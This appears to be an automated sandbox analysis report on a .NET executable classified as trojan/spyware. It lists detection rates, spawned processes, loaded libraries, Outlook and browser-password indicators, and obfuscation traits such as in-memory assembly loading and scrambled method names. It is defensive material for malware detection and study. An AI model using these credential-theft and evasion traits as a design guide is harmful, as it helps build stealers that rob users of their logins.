                    Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, Peg1g2OxAAvUkWnl1y.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/0@4/3
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                    Source: DNXS-04-22.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: DNXS-04-22.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002D03000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002CCF000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3788292550.0000000003AEE000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: DNXS-04-22.exeReversingLabs: Detection: 65%
                    Source: DNXS-04-22.exeVirustotal: Detection: 69%
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeFile read: C:\Users\user\Desktop\DNXS-04-22.exe:Zone.IdentifierJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\DNXS-04-22.exe "C:\Users\user\Desktop\DNXS-04-22.exe"
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess created: C:\Users\user\Desktop\DNXS-04-22.exe "C:\Users\user\Desktop\DNXS-04-22.exe"
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess created: C:\Users\user\Desktop\DNXS-04-22.exe "C:\Users\user\Desktop\DNXS-04-22.exe"
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess created: C:\Users\user\Desktop\DNXS-04-22.exe "C:\Users\user\Desktop\DNXS-04-22.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess created: C:\Users\user\Desktop\DNXS-04-22.exe "C:\Users\user\Desktop\DNXS-04-22.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: DNXS-04-22.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: DNXS-04-22.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: DNXS-04-22.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: JWXz.pdb source: DNXS-04-22.exe
                    Source: Binary string: JWXz.pdbSHA256 source: DNXS-04-22.exe

                    Data Obfuscation

                    barindex
                    Source: 0.2.DNXS-04-22.exe.7570000.11.raw.unpack, XG.cs.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
                    Source: DNXS-04-22.exe, BillsScreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, Peg1g2OxAAvUkWnl1y.cs.Net Code: uvccqWHofG System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, Peg1g2OxAAvUkWnl1y.cs.Net Code: uvccqWHofG System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.DNXS-04-22.exe.2e91290.6.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.DNXS-04-22.exe.8220000.13.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: DNXS-04-22.exeStatic PE information: 0x87074BFA [Mon Oct 14 22:26:02 2041 UTC]
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 0_2_075BE3D8 pushad ; ret 0_2_075BE3D9
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 0_2_07F31520 push 2405F7CBh; retf 0_2_07F31525
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_028C9770 push esp; ret 4_2_028C9771
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_028C2511 push 8BFFFFFFh; retf 4_2_028C2517
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_06777C1B push es; iretd 4_2_06777C1C
                    Source: DNXS-04-22.exeStatic PE information: section name: .text entropy: 7.955380797779595
                    Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, E3aakuxDxGKNoPVOUO.csHigh entropy of concatenated method names: 'RypgmBdVZh', 'BxQgOYY7Xn', 'ANSUTuCXBU', 'lAMU4wiEon', 'CcwUpvAsjD', 'sIHUyRpqJV', 'C69UdnuQJt', 'HA1UEDlE9p', 'APVUl4i5qX', 'QweUIGByav'
                    Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, cOXIyitFF2gaURLced.csHigh entropy of concatenated method names: 'JoOCjPop5Y', 'qUOCJi4TJA', 'vDCCgqQBXY', 'kYQCtxHR56', 'x0YCAcchlV', 'nJMguPL5ci', 'zCqg0VVddH', 'xFkgH0Uqd9', 'xMcg5T2IIy', 'MSwgfwOM67'
                    Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, ID8c9vQe98sjnu6ppA.csHigh entropy of concatenated method names: 'Dispose', 'hWhBfk3Sb8', 'DejV1uEQ0a', 'zVjSSZ2cpk', 'lTBBh264Fl', 'zYGBz7TPUv', 'ProcessDialogKey', 'sQFVG8ONIu', 'pcnVB8pU2N', 'r9cVV7HB55'
                    Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, maoXAfCsQBqkxEI3xi.csHigh entropy of concatenated method names: 'hGGq5vJ8b', 'YTIn16rZM', 'vsT7EkymJ', 'Fx5OS2VPv', 'dorwAgyMr', 'wNmseEWt4', 'hq7eEq4J96xvicdHmp', 'iSYt67h5mEWooMtAQn', 'qRLPd9bBy', 'GFqMxlATE'
                    Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, d5D6f6vXn5vtMWEjdQ.csHigh entropy of concatenated method names: 'kYAoIYrJyR', 'BRZoZ6trvT', 'gBEoijQDa2', 'cQ0o23SKwX', 'mQ1o1NPyZL', 'w24oTnoDRI', 'aGAo4MwEsL', 'YHmoptiMmi', 'iSvoydx0R8', 'ucVodsHgLR'
                    Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, cg8WfuymZA2IFj5JEe.csHigh entropy of concatenated method names: 'pKmDBjwOZV', 'd99DrFTEoO', 'mBiDcXWEKP', 'rKiDFGKeMV', 'LSEDJiuL7y', 'tVKDgRKwos', 'ltiDCEcEaK', 'MXOPHKuSYO', 'l2vP52xZaZ', 'ujbPfI6eFL'
                    Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, CdBy1uPOL3yTkn8gh7.csHigh entropy of concatenated method names: 'sYfBtg49uq', 'xBYBAk70fd', 'hMGBe4d1pX', 'JoaBWq3mNC', 'iZMBonb63b', 'owGB6t56o6', 'Tk4rs9Xy8dobZ1paKq', 'iMUvH0EeTyZNwv7KLi', 'xFcBBN2RFb', 'KZOBryKaHQ'
                    Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, uXUMPXzbUffKbh1iG7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cIoDRnyOU9', 'ClvDoX7rQM', 'FK0D6MtN8Q', 'UpYDbYidUp', 'WYdDPVos8j', 'OW6DDxH6Fa', 'SKyDMfOT3a'
                    Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, qFSrn8NrqaemYW4oQN.csHigh entropy of concatenated method names: 'SsfPvyD2k5', 'VRfP18Jqcp', 'vaYPT8bmqr', 'bPxP4TSTTS', 'tMiPinQNcX', 'fuGPp4VikC', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, NAeXU2oB9ZWsnvpV5P.csHigh entropy of concatenated method names: 'xjAUn2gCik', 'ckpU7eLnQy', 'JTaUY8u4Ww', 'EHdUwk9WMZ', 'XDHUoPMecr', 'i4mU6JYRP3', 'otmUbWKh66', 'nbqUP3h537', 'tl4UDAqQLk', 'dwvUMZcHPw'
                    Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, d3TeAR2e5ZlrinSGbo.csHigh entropy of concatenated method names: 'yZitFildtm', 'vJLtU4b4GE', 'KSatCuPlLq', 'FpbChi2yuP', 'n0ZCzUIuK7', 'NQmtGaVN5U', 'i4utBUQtBR', 'fUCtVagAHi', 'VIbtrlrjPJ', 'b2ttcDIh4J'
                    Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, CERZe5WR9RL9k9ABZdL.csHigh entropy of concatenated method names: 't82Da1Bbs4', 'n81D8ss2kv', 'qkcDqvdcBp', 'V08DndV7sS', 'qekDmGNDjv', 'mRtD7ELLFA', 'o48DOG4mV4', 'RTCDYMKGcl', 'dVrDwu3G2S', 'KYSDs5Og50'
                    Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, moRgB8JqoMTtSLl43c.csHigh entropy of concatenated method names: 'sagbeKM1nk', 'KlVbWa22Ee', 'ToString', 't0PbFpUeHw', 'jN1bJkfr7M', 'snqbUb8vKE', 'hWubgmeIk4', 'bDNbClh1iX', 'zShbt8p94J', 'WxLbAsCjCd'
                    Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, tpytbaBWxv8XpfmZLI.csHigh entropy of concatenated method names: 'GdyRY6HxBf', 'Q7WRwhdmgD', 'sk4RvK8qEs', 'oVHR1TaTpB', 'hcqR4fP14b', 's7KRp7JsFJ', 'VWBRdlm9ep', 'r3cRE9A9HP', 'q9NRIA6JeJ', 'Qs4RN6CgW5'
                    Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, Peg1g2OxAAvUkWnl1y.csHigh entropy of concatenated method names: 'AWkrjMWy1b', 'X0orFLvXPt', 'WDKrJDJrlL', 'kDorUX209A', 'BjkrgnmxeX', 'OSCrCFGqlr', 'H8NrtviDQa', 'YLjrA49jTg', 'rrKrk8MrHn', 'IvareMCDLq'
                    Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, mY3IKt45gSW4nI9Ksv.csHigh entropy of concatenated method names: 'EFIJiV7440', 'eu7J2MSHwN', 'wY2JKkm7Jd', 'L84J3veLlY', 'WlXJu8niq8', 'CdFJ0Z8vsL', 'VSYJH3KMXY', 'B5XJ5F2QrJ', 'L84JfdI7f3', 'Q4DJheE8tc'
                    Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, yqw3GuW6RHgs1vp4r1O.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'iHbMillPWb', 't00M2IZqv5', 'ONsMKHiXkd', 'RtvM3TRBcp', 'm4HMuVyhgY', 'Y0GM0reuge', 'VXmMHUZnaX'
                    Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, TsdG8tus2h3ewMhpA4.csHigh entropy of concatenated method names: 'KQwb51HVYr', 'Hgmbho4PfQ', 'VPRPG481O0', 'O18PB6JwB1', 'z8ZbNrknnd', 'PCrbZI3iAT', 'r2CbXPrkFK', 'zBSbiAyKdX', 'yYTb20XUo1', 'iR3bKt8Y0g'
                    Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, nNpH8k8BSOkP33NmJX.csHigh entropy of concatenated method names: 'Tt3PFacLP2', 'dpnPJ0yJHF', 'wLaPUkAtcv', 'bkwPg1olZD', 'B4HPCZb6qR', 'shxPtq74Ln', 'DY1PAUqEhk', 'DwhPk3Gsof', 'rYNPeB84wJ', 'rLhPWOmEcv'
                    Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, T9Sffn1kEToq3rSGht.csHigh entropy of concatenated method names: 'i405KWRGZOF5235MvcC', 'MDmL61R7ynrQkVCLhRL', 'QRBfoMRVUupcQIbe379', 'bcxCP8Owuo', 'p15CDH4q38', 'fZTCMnhEis', 'g7F8q4RlwaVsNTq8SyJ', 'uXxbKuRj6G27TCpbsWh'
                    Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, s9KQgomUYRDcyGLx3J.csHigh entropy of concatenated method names: 'ip8ta9Eteb', 'dsvt8SKY8p', 'lvvtqnmAdn', 'P8stnufJvf', 'kNNtmO0jou', 'nS1t7YRjIW', 'JmotOoUMwi', 'algtYM56b7', 'OWstwcGCGY', 'OJAtsWYKBe'
                    Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, E3aakuxDxGKNoPVOUO.csHigh entropy of concatenated method names: 'RypgmBdVZh', 'BxQgOYY7Xn', 'ANSUTuCXBU', 'lAMU4wiEon', 'CcwUpvAsjD', 'sIHUyRpqJV', 'C69UdnuQJt', 'HA1UEDlE9p', 'APVUl4i5qX', 'QweUIGByav'
                    Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, cOXIyitFF2gaURLced.csHigh entropy of concatenated method names: 'JoOCjPop5Y', 'qUOCJi4TJA', 'vDCCgqQBXY', 'kYQCtxHR56', 'x0YCAcchlV', 'nJMguPL5ci', 'zCqg0VVddH', 'xFkgH0Uqd9', 'xMcg5T2IIy', 'MSwgfwOM67'
                    Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, ID8c9vQe98sjnu6ppA.csHigh entropy of concatenated method names: 'Dispose', 'hWhBfk3Sb8', 'DejV1uEQ0a', 'zVjSSZ2cpk', 'lTBBh264Fl', 'zYGBz7TPUv', 'ProcessDialogKey', 'sQFVG8ONIu', 'pcnVB8pU2N', 'r9cVV7HB55'
                    Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, maoXAfCsQBqkxEI3xi.csHigh entropy of concatenated method names: 'hGGq5vJ8b', 'YTIn16rZM', 'vsT7EkymJ', 'Fx5OS2VPv', 'dorwAgyMr', 'wNmseEWt4', 'hq7eEq4J96xvicdHmp', 'iSYt67h5mEWooMtAQn', 'qRLPd9bBy', 'GFqMxlATE'
                    Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, d5D6f6vXn5vtMWEjdQ.csHigh entropy of concatenated method names: 'kYAoIYrJyR', 'BRZoZ6trvT', 'gBEoijQDa2', 'cQ0o23SKwX', 'mQ1o1NPyZL', 'w24oTnoDRI', 'aGAo4MwEsL', 'YHmoptiMmi', 'iSvoydx0R8', 'ucVodsHgLR'
                    Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, cg8WfuymZA2IFj5JEe.csHigh entropy of concatenated method names: 'pKmDBjwOZV', 'd99DrFTEoO', 'mBiDcXWEKP', 'rKiDFGKeMV', 'LSEDJiuL7y', 'tVKDgRKwos', 'ltiDCEcEaK', 'MXOPHKuSYO', 'l2vP52xZaZ', 'ujbPfI6eFL'
                    Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, CdBy1uPOL3yTkn8gh7.csHigh entropy of concatenated method names: 'sYfBtg49uq', 'xBYBAk70fd', 'hMGBe4d1pX', 'JoaBWq3mNC', 'iZMBonb63b', 'owGB6t56o6', 'Tk4rs9Xy8dobZ1paKq', 'iMUvH0EeTyZNwv7KLi', 'xFcBBN2RFb', 'KZOBryKaHQ'
                    Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, uXUMPXzbUffKbh1iG7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cIoDRnyOU9', 'ClvDoX7rQM', 'FK0D6MtN8Q', 'UpYDbYidUp', 'WYdDPVos8j', 'OW6DDxH6Fa', 'SKyDMfOT3a'
                    Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, qFSrn8NrqaemYW4oQN.csHigh entropy of concatenated method names: 'SsfPvyD2k5', 'VRfP18Jqcp', 'vaYPT8bmqr', 'bPxP4TSTTS', 'tMiPinQNcX', 'fuGPp4VikC', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, NAeXU2oB9ZWsnvpV5P.csHigh entropy of concatenated method names: 'xjAUn2gCik', 'ckpU7eLnQy', 'JTaUY8u4Ww', 'EHdUwk9WMZ', 'XDHUoPMecr', 'i4mU6JYRP3', 'otmUbWKh66', 'nbqUP3h537', 'tl4UDAqQLk', 'dwvUMZcHPw'
                    Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, d3TeAR2e5ZlrinSGbo.csHigh entropy of concatenated method names: 'yZitFildtm', 'vJLtU4b4GE', 'KSatCuPlLq', 'FpbChi2yuP', 'n0ZCzUIuK7', 'NQmtGaVN5U', 'i4utBUQtBR', 'fUCtVagAHi', 'VIbtrlrjPJ', 'b2ttcDIh4J'
                    Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, CERZe5WR9RL9k9ABZdL.csHigh entropy of concatenated method names: 't82Da1Bbs4', 'n81D8ss2kv', 'qkcDqvdcBp', 'V08DndV7sS', 'qekDmGNDjv', 'mRtD7ELLFA', 'o48DOG4mV4', 'RTCDYMKGcl', 'dVrDwu3G2S', 'KYSDs5Og50'
                    Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, moRgB8JqoMTtSLl43c.csHigh entropy of concatenated method names: 'sagbeKM1nk', 'KlVbWa22Ee', 'ToString', 't0PbFpUeHw', 'jN1bJkfr7M', 'snqbUb8vKE', 'hWubgmeIk4', 'bDNbClh1iX', 'zShbt8p94J', 'WxLbAsCjCd'
                    Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, tpytbaBWxv8XpfmZLI.csHigh entropy of concatenated method names: 'GdyRY6HxBf', 'Q7WRwhdmgD', 'sk4RvK8qEs', 'oVHR1TaTpB', 'hcqR4fP14b', 's7KRp7JsFJ', 'VWBRdlm9ep', 'r3cRE9A9HP', 'q9NRIA6JeJ', 'Qs4RN6CgW5'
                    Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, Peg1g2OxAAvUkWnl1y.csHigh entropy of concatenated method names: 'AWkrjMWy1b', 'X0orFLvXPt', 'WDKrJDJrlL', 'kDorUX209A', 'BjkrgnmxeX', 'OSCrCFGqlr', 'H8NrtviDQa', 'YLjrA49jTg', 'rrKrk8MrHn', 'IvareMCDLq'
                    Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, mY3IKt45gSW4nI9Ksv.csHigh entropy of concatenated method names: 'EFIJiV7440', 'eu7J2MSHwN', 'wY2JKkm7Jd', 'L84J3veLlY', 'WlXJu8niq8', 'CdFJ0Z8vsL', 'VSYJH3KMXY', 'B5XJ5F2QrJ', 'L84JfdI7f3', 'Q4DJheE8tc'
                    Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, yqw3GuW6RHgs1vp4r1O.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'iHbMillPWb', 't00M2IZqv5', 'ONsMKHiXkd', 'RtvM3TRBcp', 'm4HMuVyhgY', 'Y0GM0reuge', 'VXmMHUZnaX'
                    Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, TsdG8tus2h3ewMhpA4.csHigh entropy of concatenated method names: 'KQwb51HVYr', 'Hgmbho4PfQ', 'VPRPG481O0', 'O18PB6JwB1', 'z8ZbNrknnd', 'PCrbZI3iAT', 'r2CbXPrkFK', 'zBSbiAyKdX', 'yYTb20XUo1', 'iR3bKt8Y0g'
                    Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, nNpH8k8BSOkP33NmJX.csHigh entropy of concatenated method names: 'Tt3PFacLP2', 'dpnPJ0yJHF', 'wLaPUkAtcv', 'bkwPg1olZD', 'B4HPCZb6qR', 'shxPtq74Ln', 'DY1PAUqEhk', 'DwhPk3Gsof', 'rYNPeB84wJ', 'rLhPWOmEcv'
                    Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, T9Sffn1kEToq3rSGht.csHigh entropy of concatenated method names: 'i405KWRGZOF5235MvcC', 'MDmL61R7ynrQkVCLhRL', 'QRBfoMRVUupcQIbe379', 'bcxCP8Owuo', 'p15CDH4q38', 'fZTCMnhEis', 'g7F8q4RlwaVsNTq8SyJ', 'uXxbKuRj6G27TCpbsWh'
                    Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, s9KQgomUYRDcyGLx3J.csHigh entropy of concatenated method names: 'ip8ta9Eteb', 'dsvt8SKY8p', 'lvvtqnmAdn', 'P8stnufJvf', 'kNNtmO0jou', 'nS1t7YRjIW', 'JmotOoUMwi', 'algtYM56b7', 'OWstwcGCGY', 'OJAtsWYKBe'
                    Source: 0.2.DNXS-04-22.exe.7570000.11.raw.unpack, XG.csHigh entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
